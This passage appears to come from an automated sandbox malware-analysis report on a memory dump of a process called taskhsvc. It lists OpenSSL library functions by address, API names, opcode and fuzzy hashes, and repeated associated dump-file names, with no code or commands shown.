                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mem_ctrl$lh_new
                                                            • String ID: W
                                                            • API String ID: 539576009-655174618
                                                            • Opcode ID: f940a8bf19e81e6c91f5d6244e87904d6d44aac7e87335c665c43358cb011a73
                                                            • Instruction ID: 5333c03860f443b62e43154f84308693fdb12e789af2534909a909cc07b27a9f
                                                            • Opcode Fuzzy Hash: f940a8bf19e81e6c91f5d6244e87904d6d44aac7e87335c665c43358cb011a73
                                                            • Instruction Fuzzy Hash: 80411B75A097049FEB50EF25C54175ABBF9FB49308F22891EE4D48BB00D778A845CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF646B0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_obj2nidsk_push$E_newJ_nid2objR_newR_put_errorX509_lh_retrievesk_num
                                                            • String ID: A$g
                                                            • API String ID: 1975297513-2888248248
                                                            • Opcode ID: 60202317244ab181409ef3e358b45ea9099b8433ea7e223b4336db5c01274505
                                                            • Instruction ID: 143f344d7375352b7d3c02973d70cf94b1342202b0bebc5d170bedf0950a1157
                                                            • Opcode Fuzzy Hash: 60202317244ab181409ef3e358b45ea9099b8433ea7e223b4336db5c01274505
                                                            • Instruction Fuzzy Hash: C94115B55087019FD700EF2AD58065EBBF0BF86348F12892DE9988BB01D778E445CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3CDB0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_sk_numsk_value$N1_item_dupR_put_errorY_dupY_freesk_insert
                                                            • String ID: C$s
                                                            • API String ID: 2666543026-3044617131
                                                            • Opcode ID: aa772484907f64359ee42ff771121ac1192825fadef09769bfa2f1bb12f994e5
                                                            • Instruction ID: 9e36b56eb6d5824edeee36e7c6de9348aad83aed3d0cc75dc90537f4dd47a14a
                                                            • Opcode Fuzzy Hash: aa772484907f64359ee42ff771121ac1192825fadef09769bfa2f1bb12f994e5
                                                            • Instruction Fuzzy Hash: FE514AB25087219FD700EF25C58035BBBF0BF84748F129A2DE9A897740D774E9868BD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CE44440 Relevance: 25.7, APIs: 17, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 18ddff857b250672441fa2fc4f92ff9bc66b1f48ff71380f8839aed6a9f8a1b0
                                                            • Instruction ID: b4d2ac0f5f977d5fd7a467f601a6bf9cee7067b05e1e020aacdb61c3475bbbb6
                                                            • Opcode Fuzzy Hash: 18ddff857b250672441fa2fc4f92ff9bc66b1f48ff71380f8839aed6a9f8a1b0
                                                            • Instruction Fuzzy Hash: B0616CB41093809AE7409F66A18522AFFF17F86248F64C99EE4D88FB51D770C04ACB63
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF3EF10 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: C
                                                            • API String ID: 0-1037565863
                                                            • Opcode ID: 9c00820e392a905f99e247ae6b6e3175b104b2a7f6536840d2f28fcfcb893b75
                                                            • Instruction ID: 9eb0b3b36d0995da5c1dd7b7612f5bfdc4076b11f51ba81794cc741d4ca7b87f
                                                            • Opcode Fuzzy Hash: 9c00820e392a905f99e247ae6b6e3175b104b2a7f6536840d2f28fcfcb893b75
                                                            • Instruction Fuzzy Hash: 345150B0209721AFC740AF79C5C061BB7F0AF85348F15AAACE59D8BB54E774D8458BC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF1E6B0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocsk_pushstrlen$O_ctrlO_getsO_newO_s_memsk_new_nullstrncmp
                                                            • String ID: multipart/signed
                                                            • API String ID: 2549726919-540133298
                                                            • Opcode ID: 4ad3e580414727f5b08935e82d9fb02af40db00e40404be06ab647831ffedec3
                                                            • Instruction ID: fbebbdf027bf99083bc3d1f407d92717ff73c3b7b4345dac9b515b69f2a6fc79
                                                            • Opcode Fuzzy Hash: 4ad3e580414727f5b08935e82d9fb02af40db00e40404be06ab647831ffedec3
                                                            • Instruction Fuzzy Hash: 0B51F3B5A0D3458BE700DF25C08835BBBE0BF84318F154E2DE5A897A40D378D6498BC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF6A400 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • X509_ALGOR_new.LIBEAY32 ref: 6CF6A41E
                                                              • Part of subcall function 6CF04370: ASN1_item_new.LIBEAY32 ref: 6CF04385
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6A517
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_newR_newR_put_errorX509_
                                                            • String ID: A$h$w$|
                                                            • API String ID: 4170272431-2631548946
                                                            • Opcode ID: a7c380dae0cd27821967b5ccb657546527e4a87576adb47bb9105f1ec0294a09
                                                            • Instruction ID: befc57cb8cf1bccafc1b1457b5b65f53db4d238be6ef60e591840b22cfa6f079
                                                            • Opcode Fuzzy Hash: a7c380dae0cd27821967b5ccb657546527e4a87576adb47bb9105f1ec0294a09
                                                            • Instruction Fuzzy Hash: C22127B15083119FE700DF2AC54865BBBF0BF85348F12891DE9988BB51E7B9E844CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF44530 Relevance: 24.2, APIs: 16, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025655282.000000006CE33000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025815067.000000006CE3E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026051256.000000006CE49000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026173408.000000006CE4A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026341034.000000006CE4E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026422639.000000006CE54000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026535018.000000006CE5B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3027017173.000000006CE7A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029296434.000000006CF95000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029455585.000000006CF96000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029611449.000000006CF99000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029748735.000000006CF9C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3029817803.000000006CF9D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030569807.000000006CFF7000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030669794.000000006CFFA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3030911164.000000006D016000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031053371.000000006D01A000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D01B000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D035000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D038000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3031120663.000000006D03A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: d2049ec3897ec973bafb24757682f6863ab4a6b6f3dfeb52bd34ccd933d6e8da
                                                            • Instruction ID: ab86578e5446b191d67c54c7283f189ee45fd704f8e58851eebb8d0ede5bd4b5
                                                            • Opcode Fuzzy Hash: d2049ec3897ec973bafb24757682f6863ab4a6b6f3dfeb52bd34ccd933d6e8da
                                                            • Instruction Fuzzy Hash: DD814875A097008FCB10DF38D58065ABFF4BB86318F528A1DE5A8E7B41E730E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6CF0A400 Relevance: 24.2, APIs: 16, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            • Associated: 00000056.00000002.3025394669.000000006CE20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                            • Associated: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmpDownload File
